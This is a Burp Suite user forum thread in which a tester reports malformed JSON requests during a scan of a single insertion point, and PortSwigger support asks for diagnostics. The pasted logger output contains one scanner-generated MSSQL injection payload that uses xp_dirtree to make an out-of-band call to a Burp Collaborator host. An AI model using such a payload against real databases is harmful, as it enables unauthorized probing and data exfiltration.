Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

JSON Request broken when scanning a defined insertion point

Cyntia | Last updated: Mar 18, 2022 02:32PM UTC

Hi! When I configure a scanning (from intruder) to test only one parameter: { "roles":[" Analyst" ], "userName":"§test1§", "password":"test1", "firstName":"test1", "lastName":"test1", "email":"test1@mail.com" } In the logger I can see that the requests are broken and the payload is inserted in other parameter: Analyst": ],: "username": "test19", "password": "test1;declare @q varchar(99);set @q='\\q4v5gmizon5rqcbi19jffspjhanbb1zspgg63wrl.burpcollab'+'orator.net\nln'; exec master.dbo.xp_dirtree @q;-- 9", "firstname": "test19", "lastname": "test19", "email": "test19@hs.com" }: Is it a bug? Or I'm making a mistake? Can you help me please?

Michelle, PortSwigger Agent | Last updated: Mar 18, 2022 03:45PM UTC

Thanks for your message. I've just been trying to replicate this here but haven't been able to create quite the same issue as yet. Can you email some screenshots of all the steps you're taking, along with the output from Help -> Diagnostics to support@portswigger.net so we can take a closer look, please?

Cyntia | Last updated: Mar 21, 2022 01:47PM UTC

Mail sent! Thanks in advance

Michelle, PortSwigger Agent | Last updated: Mar 21, 2022 02:48PM UTC

Thanks :) We've got your email, we'll take a look and be in touch soon.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.